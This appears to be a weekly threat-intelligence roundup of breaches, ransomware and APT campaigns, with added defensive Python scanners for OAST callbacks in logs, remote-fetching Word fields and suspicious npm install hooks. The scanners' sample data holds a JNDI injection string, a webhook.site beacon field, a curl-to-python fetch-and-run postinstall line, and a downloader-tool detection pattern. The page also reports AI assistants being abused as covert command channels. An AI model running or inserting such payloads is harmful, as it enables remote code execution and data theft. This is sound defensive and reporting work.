Mallory

Weekly threat intelligence roundup covering breaches, ransomware, and emerging AI-enabled tradecraft

Tags: breach-disclosure-notification, mass-credential-exposure, ransomware-group-operation, third-party-vendor-breach, ai-enabled-threat-activity
Updated March 21, 2026 at 02:20 PM | 7 sources

Reporting during the week of Feb. 23 highlighted multiple unrelated security incidents and research findings rather than a single cohesive event. France’s Ministry of Economy disclosed unauthorized access to the national bank account registry FICOBA, exposing data tied to ~1.2 million accounts (e.g., names, addresses, account identifiers, and in some cases tax-related identifiers), with officials attributing access to compromised government credentials. Separately, Advantest reported a ransomware intrusion following third-party unauthorized access, University of Mississippi Medical Center experienced a ransomware event that disrupted clinics and electronic medical records, and Ukraine’s National Bank reported a supply-chain exposure at a contractor supporting its collectible coin online store (customer registration data exposed; payment data reportedly unaffected). In Taiwan, Taipei Grand Hotel said a third party accessed internal systems without authorization during the Lunar New Year period; the hotel took networks offline for forensics and warned customers to be cautious of suspicious messages.

Threat-actor and technique reporting also described ongoing campaigns and emerging tradecraft. MuddyWater (Iran-aligned) was reported targeting MENA organizations in “Operation Olalampo,” using phishing lures with malicious Office documents/macros to deploy tooling including GhostFetch, HTTP_VIP, a Rust backdoor CHAR, and an implant dubbed GhostBackDoor, with one chain also deploying AnyDesk for remote access. Separately, reporting on DPRK-linked crypto operations described sustained, social-engineering-led targeting of the crypto ecosystem following the Bybit theft, including AI-assisted persona and communication crafting and laundering via mixing/OTC pathways. Additional research noted internet-wide scanning telemetry involving OAST/Interactsh callback domains and shifts toward cookie-based injection, while another item profiled PRC-attributed Lotus Blossom as an espionage actor (including discussion of the Notepad++ ecosystem incident) and a separate post provided general reconnaissance methodology rather than incident-specific intelligence.
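
The OAST scanning item above describes callback domains turning up in request fields, increasingly via cookies rather than only in the URL or headers. As an added example, not code from the original reporting or from GreyNoise, the script below tags access-log lines that carry such a callback hostname in the request line, Referer, User-Agent or Cookie field and rolls them up by source IP and injection point. The log layout (combined format plus a trailing quoted Cookie field), the suffix list and the sample lines are assumptions and constructed input.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Callback domains used by Interactsh, Burp Collaborator and similar OAST
# services. Illustrative list (an assumption); extend it from your own telemetry.
OAST_SUFFIXES = (
    "interact.sh", "oast.fun", "oast.pro", "oast.live", "oast.site", "oast.online",
    "oast.me", "oast.today", "oastify.com", "burpcollaborator.net",
)

# Assumed access-log layout: combined log format extended with the request's
# Cookie header as a final quoted field (the server must be configured to emit it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)
# Anything that looks like a dotted hostname; candidates are then suffix-matched.
HOST_RE = re.compile(r"(?i)[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+")


def oast_hosts(text):
    """OAST callback hostnames found anywhere in text (URL-decoded first)."""
    found = set()
    for host in HOST_RE.findall(unquote(text)):
        host = host.lower()
        if any(host == s or host.endswith("." + s) for s in OAST_SUFFIXES):
            found.add(host)
    return found


def analyze(line):
    """Return a hit record for a log line carrying an OAST callback, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = {}
    for name in ("req", "referer", "ua", "cookie"):
        hosts = oast_hosts(m.group(name))
        if hosts:
            fields[name] = sorted(hosts)
    if not fields:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "fields": fields,
            "nuclei": "nuclei" in m.group("ua").lower()}


def summarize(lines):
    """Aggregate hits by source IP and by the field the callback was injected into."""
    hits = [h for h in map(analyze, lines) if h]
    return {
        "events": len(hits),
        "source_ips": sorted({h["ip"] for h in hits}),
        "by_field": dict(Counter(f for h in hits for f in h["fields"])),
        "nuclei_sessions": sum(1 for h in hits if h["nuclei"]),
    }


# Constructed sample lines (documentation-range IPs, made-up callback labels).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Feb/2026:10:01:02 +0000] "GET /?q=http://c9aq1.oast.fun/x HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Nuclei - Open-source project)" "-"',
    '203.0.113.7 - - [14/Feb/2026:10:01:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "PHPSESSID=abc; ref=${jndi:ldap://x.interact.sh/a}"',
    '198.51.100.4 - - [14/Feb/2026:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "https://example.org/" "Mozilla/5.0" "theme=dark"',
    '203.0.113.9 - - [14/Feb/2026:10:03:00 +0000] "POST /api HTTP/1.1" 404 0 "http://127.0.0.1/%2e%2e/" "curl/8.0" "x=1; cb=a.burpcollaborator.net"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = analyze(line)
        if hit:
            print(hit)
    print(summarize(SAMPLE_LOG))
```

A callback hostname in a Cookie value is the signal that survives when the request line and headers look benign, so the Cookie field is worth logging even if it is not kept by default. Matching on suffixes rather than exact hosts matters because OAST services hand out a unique subdomain per session.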

Timeline

  1. Feb 23, 2026

    Wynn breach details emerge with 800,000 records allegedly stolen

    Sherpa Intelligence reported that ShinyHunters allegedly stole more than 800,000 Wynn records and demanded $1.5 million to prevent the data from being leaked.

  2. Feb 23, 2026

    Chrome zero-day CVE-2026-2441 is reported as exploited in the wild

    Check Point reported that Chrome zero-day CVE-2026-2441 was being exploited in the wild, marking a notable active exploitation event.

  3. Feb 23, 2026

    Grandstream VoIP RCE vulnerability is publicly highlighted

    Check Point's bulletin highlighted critical Grandstream VoIP remote code execution flaw CVE-2026-2329 as a significant newly reported vulnerability.

  4. Feb 23, 2026

    Researchers detail npm typosquatting worm targeting developer and AI secrets

    Check Point summarized a supply-chain campaign in which an npm worm spread via typosquatting, stole developer and CI secrets, and targeted AI coding assistants to harvest LLM API keys.

  5. Feb 23, 2026

    Researchers report genAI-assisted FortiGate credential abuse campaign

    A Russian-speaking actor was reported using commercial generative AI to scale credential abuse against FortiGate devices and then pivot to target Veeam servers.

  6. Feb 23, 2026

    Researchers show AI assistants can be abused as covert C2 proxies

    Check Point researchers demonstrated that AI assistants such as Grok and Microsoft Copilot can be misused as covert command-and-control channels, highlighting a new AI-enabled threat technique.

  7. Feb 23, 2026

    National Bank of Ukraine contractor exposes coin store customer data

    Check Point reported a supply-chain exposure at a contractor supporting the National Bank of Ukraine's collectible coin store, leaking customer registration data but not payment information.

  8. Feb 23, 2026

    Advantest reports ransomware after unauthorized network access

    Advantest disclosed that an unauthorized party accessed parts of its network and that the incident involved ransomware, according to the Check Point bulletin and Sherpa roundup.

  9. Feb 23, 2026

    France discloses FICOBA registry breach affecting 1.2 million accounts

    French authorities disclosed that attackers used stolen credentials to access the FICOBA national bank-account registry and exfiltrated data tied to 1.2 million accounts.

  10. Feb 21, 2026

    Taipei Grand Hotel is reported targeted in a cyberattack

    Taiwan News published reporting that Taipei Grand Hotel had been targeted in a cyberattack, indicating a newly disclosed victim in Taiwan's hospitality sector.

  11. Feb 19, 2026

    University of Mississippi Medical Center detects ransomware attack

    On February 19, 2026, the University of Mississippi Medical Center detected a ransomware attack that disrupted network and IT systems, including its Epic electronic medical record environment.

  12. Feb 14, 2026

    GreyNoise observes concentrated OAST scanning activity

    Between February 14 and February 20, 2026, GreyNoise recorded 5,695 OAST domain occurrences across 3,882 sessions from 24 source IPs, with increased cookie-based injection and heavy Nuclei/loopback usage.

  13. Jan 26, 2026

    MuddyWater's Operation Olalampo is first observed

    Group-IB said a new MuddyWater campaign dubbed Operation Olalampo was first observed on January 26, 2026, targeting organizations and individuals across the Middle East and North Africa with phishing and malware delivery.

  14. Jan 1, 2026

    DPRK social-engineering campaigns steal $37.5 million in early 2026

    From January 1 to mid-February 2026, the DangerousPassword and Contagious Interview campaigns allegedly generated $37.5 million by tricking victims into installing malware that steals keys, seed phrases, and credentials.

  15. Dec 31, 2025

    DPRK-linked thefts reach a record $2 billion in 2025

    The reporting states that DPRK-linked operators stole a record $2 billion in 2025, bringing cumulative known cryptocurrency thefts attributed to North Korea to more than $6 billion.

  16. Dec 8, 2025

    Cheyenne and Arapaho Tribes suffer disruptive intrusion

    On December 8, 2025, the Cheyenne and Arapaho Tribes experienced an intrusion that disrupted schools and government operations; Rhysida later claimed responsibility according to the roundup.

  17. Sep 1, 2025

    Wynn breach reportedly begins with PeopleSoft access and employee credentials

    Sherpa Intelligence reported that the ShinyHunters-linked breach of Wynn involved initial access in September 2025 through an Oracle PeopleSoft vulnerability and an employee's credentials.

  18. Feb 21, 2025

    DPRK-linked actors steal $1.46 billion from Bybit

    On February 21, 2025, North Korea-linked operators allegedly stole about $1.46 billion in cryptoassets from Dubai-based exchange Bybit, in what the report describes as the largest confirmed crypto theft to date.

  19. Jan 1, 2025

    Lotus Blossom launches Notepad++ supply-chain operation

    The group allegedly began a 2025-2026 supply-chain campaign targeting Notepad++ by manipulating update infrastructure to distribute trojanized updater components and deliver the Chrysalis backdoor via DLL sideloading.

  20. Jun 1, 2024

    UNC6201 exploits Dell RecoverPoint zero-day in the wild

    Check Point reported that suspected Chinese threat actor UNC6201 has exploited Dell RecoverPoint for VMs zero-day CVE-2026-22769 since mid-2024, indicating a prolonged real-world exploitation window before public reporting.

  21. 2022

    Lotus Blossom targets a national certificate authority

    Lotus Blossom reportedly escalated in 2022 from traditional intrusion methods to compromising a national certificate authority, marking a shift toward attacks on mechanisms of trust.

  22. Jan 1, 2009

    Lotus Blossom begins long-running cyber-espionage activity

    Lotus Blossom is described as an APT active since at least 2009, conducting cyber-espionage operations primarily against government, military, and strategic-sector targets in the Asia-Pacific region.

Sources

First source published February 23, 2026 at 09:01 AM; 2 more from sources including taiwannews.com.tw and the SOCRadar blog.

Related Stories

Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation

The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. 
Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.

1 month ago
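
The MacroMaze item above hinges on a Word field (`INCLUDEPICTURE`) that makes the document fetch a remote URL when it is opened, which works whether or not macros run. The following is an added example, not code from the original report: it opens a .docx, joins field codes that have been split across runs, and reports fields that point at external URLs together with the `\d` switch that forces a fetch on open. The in-memory sample document and the placeholder `https://webhook.site/EXAMPLE-ID` URL are constructed for the test.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# Field types that can pull remote content when the document is opened.
REMOTE_FIELD_RE = re.compile(r"^\s*(INCLUDEPICTURE|INCLUDETEXT|DDEAUTO|DDE|HYPERLINK)\b", re.I)
URL_RE = re.compile(r'(?i)\b(?:https?|ftp|file)://[^\s"]+')
# Parts that can carry fields; headers/footers are a common place to hide them.
PARTS_RE = re.compile(r"^word/(document|header\d*|footer\d*)\.xml$")


def field_codes(xml_bytes):
    """Complete field codes from one WordprocessingML part.

    instrText is often split across many runs to defeat naive string matching,
    so the pieces between a fldChar begin/end pair are joined back together
    (nested fields are folded into the outermost one, which is fine for triage).
    """
    root = ET.fromstring(xml_bytes)
    depth, buf, codes = 0, [], []
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    codes.append("".join(buf))
                    buf = []
        elif el.tag == W + "instrText" and depth > 0:
            buf.append(el.text or "")
    return codes


def scan_docx(data):
    """Findings for remote-fetching fields in a .docx/.docm/.dotm byte string."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not PARTS_RE.match(name):
                continue
            for code in field_codes(z.read(name)):
                m = REMOTE_FIELD_RE.match(code)
                urls = URL_RE.findall(code)
                if m and urls:
                    findings.append({
                        "part": name,
                        "field": m.group(1).upper(),
                        "urls": urls,
                        # \d: picture data is not stored in the file, so Word fetches it on open
                        "fetch_on_open": bool(re.search(r"\\d(\s|$)", code)),
                    })
    return findings


def build_sample_docx(field_code, chunk=6):
    """Minimal in-memory .docx (constructed test input) whose single field code is
    split across runs of `chunk` characters, as seen in evasive documents."""
    runs = "".join(
        f'<w:r><w:instrText xml:space="preserve">{field_code[i:i + chunk]}</w:instrText></w:r>'
        for i in range(0, len(field_code), chunk)
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>[image]</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed field codes; the webhook.site path is a placeholder, not a real endpoint.
BEACON_FIELD = ' INCLUDEPICTURE "https://webhook.site/EXAMPLE-ID" \\d \\* MERGEFORMAT '
BENIGN_FIELD = " PAGE \\* MERGEFORMAT "

if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx(BEACON_FIELD)):
        print(finding)
```

Word can also reach out through an image relationship marked `TargetMode="External"` in `word/_rels/document.xml.rels` without any field code, so a complete triage also lists external relationship targets; this scanner covers the field-code path only.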
Security Research Roundup: Supply-Chain Malware, Phishing Operations, and Evolving Social Engineering

Multiple security reports and investigations highlighted active threats spanning software supply chain abuse, phishing operations, and commodity malware delivery. Socket identified **four malicious NuGet packages** (e.g., *NCryptYo*, *DOMOAuth2_*, *IRAOAuth2.0*, *SimpleWriter_*) published by `hamzazaheer` that targeted **ASP.NET** developers by exfiltrating ASP.NET Identity data (users/roles/permissions) and manipulating authorization to maintain persistence; the campaign used a staged loader that set up a local proxy on `localhost:7152` to relay traffic to dynamically resolved C2 infrastructure. Separately, investigators disrupted a logistics-focused **phishing-as-a-service** operation (“**Diesel Vortex**”) tied to Russian/Armenian operators, which used dozens of domains to target users of platforms such as **DAT**, **Truckstop**, **Penske Logistics**, **EFS**, and **Timocom**, resulting in theft of over **1,600 credentials** and attempted **EFS check fraud**. Fortinet also detailed a **multi-stage Agent Tesla** infection chain delivered via phishing with RAR attachments leading to `.jse` and PowerShell stages, culminating in in-memory execution and process hollowing into `C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe`. Threat intelligence and ecosystem reporting also underscored how attackers are scaling operations and bypassing traditional controls. Group-IB reported **MuddyWater** (“Operation Olalampo”) targeting the **MENA** region with new tooling including **GhostFetch** and a Rust backdoor (**CHAR**) controlled via **Telegram**, plus variants that deploy **AnyDesk**; the report noted indicators consistent with **AI-assisted development**. 
Dark Reading described the rise of **telephone-oriented attack delivery (TOAD)** emails—messages containing only a phone number—which accounted for a significant share of gateway-bypassing detections in StrongestLayer’s dataset, reflecting a shift toward social-engineering paths that evade link/attachment scanning. Confiant reported disrupting **D-Shortiez** malvertising operations after discovering exposed internal testing/admin infrastructure, attributing **59 million** malicious ad impressions (primarily US-targeted) to scam campaigns, while Interpol-backed **Operation Red Card 2.0** reported **651 arrests** and **$4.3M** recovered across 16 African countries in actions against fraud rings and cybercrime syndicates.

1 month ago
Multi-stage phishing and supply-chain malware campaigns targeting credentials and long-term access

Multiple reports highlight active campaigns using *phishing* and *software supply-chain abuse* to steal credentials and establish persistence. eSentire described an espionage-focused operation targeting residents of India with emails impersonating the Income Tax Department, leading victims to a malicious archive that uses DLL side-loading with a legitimate signed Microsoft application, extensive anti-analysis checks, in-memory shellcode unpacking, UAC bypass, and process masquerading; the payload was identified as a **Blackmoon**-family variant that specifically attempts to disable **Avast Free Antivirus** by automating UI interactions to add exclusions. Separately, Aikido reported a malicious npm package (`ansi-universal-ui`) that deploys a multi-stage infostealer (“**G_Wagon**”) by abusing `postinstall` execution, downloading a Python runtime, running an obfuscated payload, and exfiltrating browser credentials, cloud credentials, Discord tokens, and data from 100+ cryptocurrency wallets to an Appwrite storage bucket; it also includes a Windows DLL used for browser-process injection via NT native APIs. In parallel, network-edge exploitation remains a key access vector: Risky Business reported a renewed wave of attacks against **Fortinet FortiGate** devices via a vulnerability Fortinet allegedly “patched” in December but which attackers can still exploit, enabling SSO authentication bypass (via crafted SAML), creation of new admin accounts, and theft of device configuration; mitigations include disabling the FortiCloud SSO feature (not enabled by default). 
Several other items are general awareness or roundup content rather than specific incident reporting: TechTarget and other blogs emphasized ongoing phishing/email risk (including relay spam abusing legitimate Zendesk instances) and password hygiene, while The Hacker News published a multi-story bulletin that includes (among other items) a spear-phishing campaign in Afghanistan delivering a FALSECUB backdoor via a GitHub-hosted ISO and LNK execution chain; Risky Business also covered Iran’s internet blackout and Starlink jamming/spoofing as a communications-control issue rather than an enterprise cyber incident.

1 month ago
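
Both the npm worm in the timeline (typosquatting plus developer-secret theft) and the `ansi-universal-ui` package above rely on npm running install-time lifecycle scripts. As an added example, not the researchers' code, this audit reads dependency manifests and flags install hooks whose commands reach for a downloader or interpreter, plus package names one edit away from a popular package. The allowlist, the `expres` and `native-addon` names and every script body are constructed; only the `ansi-universal-ui` name is from the page.

```python
import json
import re

# Popular package names to compare against (illustrative; use your own allowlist).
POPULAR = ("lodash", "express", "chalk", "axios", "react", "commander", "debug", "minimist")
# Hooks npm runs automatically during `npm install` unless --ignore-scripts is set.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Command fragments rarely needed at install time but common in droppers.
SUSPICIOUS_CMD = re.compile(r"(?i)\b(curl|wget|node\s+-e|python3?|powershell|bash\s+-c|base64|eval)\b")


def levenshtein(a, b):
    """Plain edit distance (insert/delete/substitute); fine for short package names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, known=POPULAR, max_dist=1):
    """Known names within max_dist edits of `name` (scope stripped), excluding an exact match."""
    bare = name.split("/")[-1].lower()
    return [k for k in known if k != bare and levenshtein(bare, k) <= max_dist]


def audit_manifest(manifest):
    """Findings for one parsed package.json dict."""
    name = manifest.get("name", "?")
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            findings.append({
                "package": name, "type": "install-hook", "hook": hook,
                "severity": "high" if SUSPICIOUS_CMD.search(cmd) else "low",
                "detail": cmd,
            })
    for known in typosquat_candidates(name):
        findings.append({"package": name, "type": "typosquat", "severity": "medium",
                         "detail": f"1 edit from {known}"})
    return findings


def audit_all(manifests):
    """Run the audit over every manifest (e.g. each node_modules/*/package.json)."""
    return [f for m in manifests for f in audit_manifest(m)]


# Constructed sample manifests; the script bodies are not the real package contents.
SAMPLES = [
    {"name": "ansi-universal-ui", "version": "1.0.3",
     "scripts": {"postinstall": "node -e \"require('child_process').execSync('curl -s https://example.invalid/s | python3')\""}},
    {"name": "expres", "version": "4.18.2"},
    {"name": "lodash", "version": "4.17.21"},
    {"name": "native-addon", "version": "2.0.0", "scripts": {"install": "node-gyp rebuild"}},
]

if __name__ == "__main__":
    for finding in audit_all(SAMPLES):
        print(json.dumps(finding))
```

`npm ci --ignore-scripts` (or `npm config set ignore-scripts true`) stops these hooks from running at all; packages that genuinely need a native build step then have to be rebuilt explicitly, which is the trade-off the low-severity `install` finding illustrates. Edit distance alone will not catch every lookalike (transpositions count as two edits here), so treat it as a triage signal rather than a verdict.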
